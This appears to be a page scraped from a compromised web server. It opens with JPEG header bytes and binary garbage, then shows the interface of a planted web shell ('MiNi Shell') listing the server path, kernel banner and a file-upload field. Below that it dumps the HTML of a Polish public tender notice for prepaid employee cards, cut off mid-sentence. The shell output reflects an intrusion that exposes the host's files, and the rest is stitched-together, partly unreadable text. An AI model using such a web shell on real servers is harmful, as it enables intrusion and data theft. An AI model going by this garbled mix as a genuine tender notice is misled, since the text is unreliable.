JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250218/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250218/0010968401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> DOSTAWA ELEKTRONICZNYCH KART PRZEDPŁACONYCH DLA PRACOWNIKÓW PISF </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Polski Instytut Sztuki Filmowej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 140214847</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kruczkowskiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-412</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">221026462</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pisf@pisf.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://pisf.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Kinematografia </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOSTAWA ELEKTRONICZNYCH KART PRZEDPŁACONYCH DLA PRACOWNIKÓW PISF </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-303fc781-f1f6-471b-a4d3-0819db8ce92e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00109684</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00084391/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa elektronicznych kart przedpłaconych.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.platformazakupowa.pl/transakcja/1060273 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pisf</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1 Komunikacja w postępow. o udzielenie zamówienia w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów/oświadczeń między<br/>Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w Ustawie p.z.p., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunik. elektronicznej zdefiniowane w ustawie z dn.18.07.2002r. o świadczeniu usług drogą elektroniczną (t.j.Dz.U. z 2024r. poz.1530 ze zm).<br/>2 Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 Ustawy p.z.p., podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt.<br/>3 Ofertę, a także oświadczenie, o jakim mowa w pkt 13.2 SWZ składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4 Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują przez Platformę, dostępną pod adresem:<br/>https://platformazakupowa.pl/pn/pisf .<br/>5 Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie<br/>Zakupowej. Zarejestrowanie i utrzymywanie konta na Platformie Zakupowej oraz korzystanie z Platformy jest bezpłatne.<br/>6 Zamawiający będzie przekazywał Wykonawcom informacje za pośrednictwem Platformy. Informacje dotyczące odpowiedzi na<br/>pytania, zmiany SWZ, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na Platformie. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana za pośrednictwem Platformy do konkretnego Wykonawcy.<br/>7 Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na Platformie<br/>przesłanych przez Zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>8 Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie Internetowej Platformy zakupowej<br/>platformazakupowa.pl Open Nexus Sp. z o.o. (https://platformazakupowa.pl/strona/1-regulamin)”.<br/>9 Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego tj. bezpłatnie rejestrując się lub logując (w<br/>przypadku posiadania konta w Platformie Zakupowej), akceptuje warunki korzystania z Platformy, określone w Regulaminie oraz<br/>uznaje go za wiążący.<br/>10 Zamawiający podaje minimalne wymagania techniczne związane z korzystaniem z Platformy:<br/>1 łącze internetowe o przepustowości co najmniej 512 kbit/s;<br/>2 zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer np., Chrome i FireFox w najnowszej wersji;<br/>3 włączona obsługa języka Javascript w przeglądarce internetowej;<br/>4 akceptacja plików typu „cookies” w przeglądarce internetowej.<br/>5 komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MSWindows 7, MacOs x 10 4, Linux, lub ich nowsze wersje;<br/>6 zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf;<br/>7 Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3;<br/>8 Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>9 Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ.<br/>10. Oświadczenia lub dokumenty, o których mowa w Rozporządz. Ministra Rozwoju Pracy i Technologii z dn.23.12.2020r. w sprawie<br/>rodzajów podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od wykonawcy<br/>Uwaga! Ciąg dalszy informacji w SEKCJA IX–POZOSTAŁE INFORMACJE</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/pisf</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Państwa danych osobowych jest Polski Instytut Sztuki Filmowej reprezentowany przez Dyrektora PISF ul. Leona Kruczkowskiego 2, 00-412 Warszawa;<br/>2. Administrator wyznaczył Inspektora Danych Osobowych, adres e-mail: iodo@pisf.pl.<br/>3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu:<br/>rozpatrzenia złożonej oferty;<br/>w celu zlecenia usług lub zamówieniem dostaw oraz ich realizacją.<br/>4. Podstawą prawną przetwarzania Pani/Pana danych osobowych jest w szczególności:<br/>Rozporządzenie Parlamentu Europejskiego i Rady(UE) 2016/679 z dn. 27.04. 2016r. w sprawie ochrony osób fizycznych w związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE, w tym:<br/>art.6 ust.1 lit.b) RODO w celu zawarcia i realizacji umowy/zlecenia usług/zamówienia dostaw;<br/>art.6 ust.1 lit.c) RODO w celu wypełnienia obowiązku prawnego ciążącego na Administratorze;<br/>art.6 ust.1 lit.f) RODO w celu właściwej realizacji usługi/dostawy, ochrony zasobów Administratora, ustalenia, dochodzenia roszczeń<br/>oraz obrony przez roszczeniami;<br/>-ustawa z dn.10.05.2018r. o ochronie danych osobowych;<br/>-ustawa z dn.11.09.2019r. Prawo zamówień publicznych;<br/>-ustawa z dn.23.04.1964r. Kodeks cywilny;<br/>-ustawa z dn.27.08.2009r. o finansach publicznych;<br/>-ustawa z dn.29.09.1994r. o rachunkowości;<br/>-ustawa z dn.6.09.2001r. o dostępie do informacji publicznej;<br/>-ustawa z dn.14.07.1983r. o narodowym zasobie archiwalnym i archiwach.<br/>5. Odbiorcą Państwa danych osobowych mogą być podmioty posiadające upoważnienie do przetwarzania danych osobowych na<br/>postawie przepisów prawa powszechnie obowiązującego (w tym ustawy z dn. 6.09.2001r. o dostępie do informacji publicznej). W<br/>uzasadnionych przypadkach dane osobowe zostaną przekazane podmiotom, z którymi Administrator Danych Osobowych zawarł<br/>umowę powierzenia przetwarzania danych osobowych m. in. podmiotom świadczącym usługi w zakresie systemów<br/>informatycznych/oprogramowania oraz operatorom pocztowym. Państwa dane osobowe będą udostępnione na wniosek osób lub<br/>podmiotów zgodnie z ustawą z dn.11.09.2019r. Prawo zamów. publiczn..<br/>6. Państwa dane osobowe nie będą przekazywane do państw trzecich poza obszar Unii Europejskiej.<br/>7. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Ustawy p.z.p. przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy (art.78 ust.4 Ustawy p.z.p.);<br/>8. Obowiązek podania przez Państwa danych osobowych bezpośrednio dotyczących Państwa jest wymogiem określonym w<br/>przepisach Ustawy p.z.p., związanym z udziałem w niniejszym postępowaniu;<br/>9. W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do<br/>postanowień art.22 RODO;<br/>10. Posiadają Państwo:<br/>a) zgodnie z art.15 RODO - prawo dostępu do danych osobowych Państwa dotyczących (z zastrzeżeniem, że w sytuacji, gdy<br/>skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku, mogą Państwo zostać<br/>zobowiązani do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub<br/>daty postępowania o udzielenie zamówienia publicznego albo sprecyzowania nazwy lub daty zakończonego postępowania o<br/>udzielenie zamówienia);<br/>b) zgodnie z art.16 RODO- prawo do sprostowania Państwa danych osobowych (z tym, że skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z Ustawą p.z.p. oraz nie może naruszać integralności protokołu z postępowania oraz załączników do niego);<br/>c) zgodnie z art.18 RODO-prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu<br/>trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków,<br/>Uwaga! Ciąg Dalsz. inform. w SEKCJI IX–POZOST.INFORM.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, iż w związku z art. 19 ust. 2 i 3 Ustawy p.z.p.:<br/>a) skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z Ustawą;<br/>b) w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO,<br/>nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/2025/DAG</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa elektronicznych kart przedpłaconych, zabezpieczonych indywidualnym kodem PIN, wydanych na okaziciela, w maksymalnej liczbie 116, zwanych dalej „Kartami&#34;, zasilonych łączoną kwotą nie przekraczającą 235.200,00 złotych.<br/>2.	Szczegółowy opis przedmiotu zamówienia zawarty został w Załączniku nr 2 do SWZ (Opis Przedmiotu Zamówienia) oraz w Projektowanych postanowieniach umowy stanowiących Załącznik nr 4 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30163000-9 - Karty płatnicze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane zgodnie z poniższymi kryteriami:<br/>L.p. Kryterium Waga kryterium Maksymalna liczba punktów możliwa do uzyskania w kryterium<br/>1. CENA (C) 60% 60 pkt<br/>2. TERMIN WAŻNOŚCI ELEKTRONICZNYCH KART PRZEDPŁACONYCH (T) 15% 15 pkt<br/>3. DODATKOWA FUNKCJONALNOŚĆ – PŁATNOŚCI ZBLIŻENIOWE KARTĄ W TERMINALU PŁATNICZYM (F) 15% 15 pkt<br/>4. KSIĄŻECZKA RABATOWA (K) 10% 10 pkt<br/>Razem 100 pkt<br/>16.1.1. Punkty za kryterium 1 „CENA” (C):<br/>1.1.Liczba punktów uzyskanych przez Wykonawcę w tym kryterium zostanie przeliczona z wykorzystaniem następującego wzoru i<br/>zaokrąglona do dwóch miejsc po przecinku:<br/>Cmin<br/>C = ------------ x 60% x 100<br/>Cwer<br/>Gdzie:<br/>C – oznacza liczbę punktów, jakie otrzyma oferta badana za kryterium (C);<br/>Cmin – oznacza najniższą cenę jednostkową brutto spośród ważnych i nieodrzuconych ofert;<br/>Cwer – oznacza cenę jednostkową brutto oferty badanej.<br/>1.2.Ocena w tym kryterium jest dokonywana na podstawie oświadczenia Wykonawcy złożonego w ofercie.<br/>1.3. Maksymalna liczba punktów w tym kryterium wynosi 60.<br/>16.1.2. Punkty za kryterium 2. „TERMIN WAŻNOŚCI ELEKTRONICZNYCH KART PRZEDPŁACONYCH” (T):<br/>1.1.Liczba punktów uzyskanych przez Wykonawcę w tym kryterium zostanie przeliczona z wykorzystaniem następującego wzoru i zaokrąglona do dwóch miejsc po przecinku:<br/>Twer<br/>T = ------------ x 15% x 100<br/>Tmax<br/>Gdzie:<br/>T – oznacza liczbę punktów, jakie otrzyma oferta badana za kryterium (Cp);<br/>Twer – oznacza zaoferowany termin ważności badanej oferty;<br/>Tmax – oznacza najdłuższy zaoferowany termin ważności elektronicznych kart przedpłaconych spośród wszystkich złożonych ofert.<br/>1.2. Najkrótszy możliwy termin ważności karty to 12 miesięcy od daty aktywacji karty, natomiast maksymalny termin ważności karty<br/>to 36 miesięcy, od daty aktywacji karty.<br/>• Jeśli oferent złoży ofertę uwzględniającą krótszy termin niż 12 miesięcy od daty aktywacji karty lub nie wpisze terminu ważności<br/>kart, to oferta będzie podlegać odrzuceniu jako niezgodna z warunkami zamówienia na podstawie art. 226 § 1 pkt 5) ustawy p.z.p.<br/>• Jeśli oferent złoży ofertę uwzględniającą dłuższy termin niż 36 miesięcy, od daty aktywacji karty to Wykonawca uzyska 15 pkt. w<br/>danym kryterium.<br/>• W przypadku, gdy Wykonawca zaoferuje minimalny termin ważności Kart, tj. 12 miesięcy, od daty aktywacji karty to oferta<br/>Wykonawcy otrzyma w tym kryterium oceny ofert 0 punktów.<br/>1.3 Ocena w tym kryterium jest dokonywana na podstawie oświadczenia Wykonawcy złożonego w ofercie.<br/>1.4. Maksymalna liczba punktów w tym kryterium wynosi 15.<br/>16.1.3. Punkty za kryterium 3. „DODATKOWA FUNKCJONALNOŚĆ – PŁATNOŚCI ZBLIŻENIOWE KARTĄ W TERMINALU PŁATNICZYM (F):<br/>1.1.Liczba punktów uzyskanych przez Wykonawcę w tym kryterium zostanie przyznana według zasad określonych w tabeli:<br/>Możliwości dokonywania płatności zbliżeniowych w terminalach płatniczych za pomocą Kart oferowanych przez Wykonawcę<br/>TAK NIE<br/>15 pkt 0 pkt<br/>1.2.Ocena w tym kryterium jest dokonywana na podstawie oświadczenia Wykonawcy złożonego w ofercie.<br/>1.3. Maksymalna liczba punktów w tym kryterium wynosi 15.<br/>16.1.4. Punkty za kryterium 4. „KSIĄŻECZKA RABATOWA ” (K):<br/>1.1.Liczba punktów uzyskanych przez Wykonawcę w tym kryterium zostanie przyznana według zasad określonych w tabeli:<br/>Załączenie do każdej karty przedpłaconej książeczki rabatowej w formie papierowej lub formie elektronicznej, zawierającej minimum 10 rabatów.<br/>TAK NIE<br/>10 pkt 0 pkt<br/>1.2.Ocena w tym kryterium jest dokonywana na podstawie oświadczenia Wykonawcy złożonego w ofercie.<br/>1.3. Maksymalna liczba punktów w tym kryterium wynosi 10.<br/>CIĄG DALSZY w SEKCJA IX – POZOSTAŁE INFORMACJE</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN WAŻNOŚCI ELEKTRONICZNYCH KART PRZEDPŁACONYCH</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">DODATKOWA FUNKCJONALNOŚĆ – PŁATNOŚCI ZBLIŻENIOWE KARTĄ W TERMINALU PŁATNICZYM</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">KSIĄŻECZKA RABATOWA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 7.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>7.1.1. nie podlegają wykluczeniu z postępowania oraz spełniają warunki udziału w postępowaniu.<br/>Ocena spełniania w/w warunku zostanie dokonana przez Zamawiającego na podstawie złożonego oświadczenia, o którym<br/>mowa w art. 125 ust. 1 Ustawy p.z.p., według wzoru stanowiącego Załącznik nr 3 do SWZ, według formuły 